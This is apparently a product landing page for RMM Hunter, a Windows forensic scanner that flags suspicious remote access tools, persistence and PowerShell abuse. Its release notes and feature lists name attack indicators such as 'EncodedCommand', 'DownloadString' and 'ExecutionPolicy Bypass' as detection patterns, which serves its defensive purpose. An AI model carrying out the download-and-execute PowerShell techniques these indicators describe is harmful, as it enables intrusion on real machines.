RMM Hunter Download

RMMHunter

Windows DFIR scanner for suspicious remote access tools, living-off-the-land traces, Watch Preview alerts, and endpoint trust signals.

Download for Windows Verify release
Latest release
v0.3.4 Evidence Noise Fix
License
Apache-2.0
Code signing
Unsigned beta

RMM Hunter

Device scan

Check this Windows device for unauthorized remote access tools and suspicious admin traces.

Check updates Scan this device
Scan Evidence Timeline Watch Trust Info
Update status RMM Hunter is up to date

RMM Hunter 0.3.4 is up to date.

Scanning

Complete
Scan complete
Dashboard ready. Review grouped findings and export the full report when needed.
Findings0
High0
Medium0
Low0
Summary

5 grouped findings, 259 artifacts. Review evidence before cleanup.

What's new in v0.3.4

Cleaner evidence, fewer false alarms.

RMM Hunter now resolves startup shortcuts to their executable targets, treats plain local PowerShell policy bypass as lower-confidence context, and avoids flagging security-search patterns as real activity.

Startup review

Shortcut target signatures

Startup-folder .lnk files are checked through their target executable where possible, so signed tools like Tailscale are not treated as unsigned just because the shortcut itself has no signature.

PowerShell

Better confidence labels

Plain ExecutionPolicy Bypass -File is kept as low-confidence context unless it appears with encoded content, downloads, hidden windows, WMI, Defender events, or new persistence.

Security review

Searches stay searches

Local searches for strings such as EncodedCommand or DownloadString no longer become findings by themselves when they are clearly part of a review command.

Defender

Remediation context is clearer

When Defender reports that a malware action completed successfully, RMM Hunter marks the evidence with stronger confidence while still keeping it in the timeline for review.

Evidence-first approach

It reads what Windows already knows.

RMM Hunter does not probe networks or exploit systems. It collects local artifacts, groups related signals, and explains why each finding deserves review.

01

Installed apps

Find known remote access tools through uninstall registry entries.

02

Services

Review service paths, recent service creation, signatures, and user-writable locations.

03

Tasks and startup

Surface persistence points that could restart tools after reboot.

04

PowerShell and WMI

Look for encoded commands, hidden windows, download behavior, and WMI traces.

05

RMM logs and KAPE

Import vendor traces and optional KAPE output for deeper DFIR context.

06

Defender and trust

Review detections, remediation events, protection changes, code-signing trust, and roots.

Triage workflow

Designed for the first hour of uncertainty.

Use Scan for a careful snapshot, then Watch when the device needs short-term alerting while context is still being confirmed.

Case timeline

  1. Scan this device

    Collect local Windows artifacts and event logs where available.

  2. Review grouped findings

    See exact paths, services, task actions, event excerpts, and confidence labels.

  3. Turn on Watch when needed

    Use local alert history, the built-in Discord webhook guide, test alerts, and policy-gated response actions for short-term monitoring.

  4. Decide with context

    Export JSON or PDF, confirm with the device owner or IT provider, then remediate with a documented timeline.

High

Defender malware or remediation event observed

Defender reported a named threat and action. RMM Hunter preserves the event context so the next step is evidence-led.

Medium

Recent remote access installer or script

An installer in Downloads or Temp may be benign, but it needs an owner, purpose, and timeline.

Low

Routine Defender configuration change

Low-severity context stays in the timeline without inflating the verdict by itself.

Trust by design

Powerful triage. Guarded response.

Security tools have to be boring in the right places. RMM Hunter is local-first, transparent, and approval-required by default.

No automatic deletion

Files are preserved by default. Preview response actions require policy approval and every action is recorded.

Local reports

Reports stay on the device unless the user exports or shares them. Optional AI requires a user-provided provider key.

Open source

Rules, collectors, release workflow, docs, and verification instructions are public on GitHub.

Release verification

GitHub releases include SHA256 checksums, a manifest, a verification guide, and Authenticode status. Current beta binaries are unsigned unless a release manifest says SignPath signing is valid.

What it does

  • Detects suspicious RMM and breach traces on Windows endpoints.
  • Shows exact artifacts, timestamps, paths, event IDs, and finding reasons.
  • Exports JSON, PDF, and optional mapped detection output.
  • Adds Watch Preview alerts, checkpoints, and guarded response actions.
  • Explains next steps without changing the deterministic verdict.

What it does not do

  • Does not exploit systems or bypass security controls.
  • Does not scan the network or reach into other devices.
  • Does not automatically delete files, stop services, isolate the host, or uninstall tools.
  • Does not claim a clean result is proof that a system is safe.

Project facts for search and AI answers

What RMM Hunter is, in plain terms.

This section is intentionally direct so search engines, AI assistants, analysts, and small business owners can understand the project without guessing from marketing copy.

Primary category

Open-source Windows endpoint DFIR triage and RMM abuse review tool.

Best-fit searches

RMM abuse scanner, remote access tool detection, AnyDesk evidence, TeamViewer investigation, ScreenConnect triage, Windows DFIR scanner, and KAPE RMM import.

Evidence sources

Installed apps, services, event ID 7045, scheduled tasks, startup entries, PowerShell logs, WMI activity, process events, Defender events, vendor logs, KAPE output, code-signing trust, and trusted roots.

Verdict model

RMM Hunter produces deterministic clean, needs_review, and high_risk verdicts from local rules. Optional AI explanations cannot change the verdict.

Safety boundary

It does not exploit systems, scan networks, delete files, stop services, uninstall tools, bypass controls, or upload scan reports by default.

RMM Hunter FAQ

Common questions before running a scanner.

Is RMM Hunter an antivirus?

No. It is a triage and evidence organizer for suspicious remote access tooling, living-off-the-land traces, Watch Preview alerts, and Windows trust-health signals. It should complement, not replace, endpoint protection and incident response.

Does a clean result prove the device is safe?

No. A clean result means the collected sources did not contain the specific signals RMM Hunter checks. Missing logs, disabled auditing, deleted artifacts, or unsupported tools can limit coverage.

Can it help after a support scam?

Yes. It can help preserve and organize evidence such as remote access tools, services, downloads, PowerShell activity, Defender events, vendor logs, and Watch Preview changes after a suspicious support session.

Where should sensitive reports be shared?

Do not post raw reports publicly. Reports can contain usernames, file paths, command lines, service names, event excerpts, webhook context, and local security configuration details.

Windows-first public beta

Download RMM Hunter.

Use it as a careful second opinion after suspicious remote support, RMM abuse, or endpoint alerts. Version 0.3.4 reduces noisy evidence from signed startup shortcuts and local PowerShell review commands.

Download installer View GitHub
Release page SHA256SUMS MDP project brief Privacy policy Contact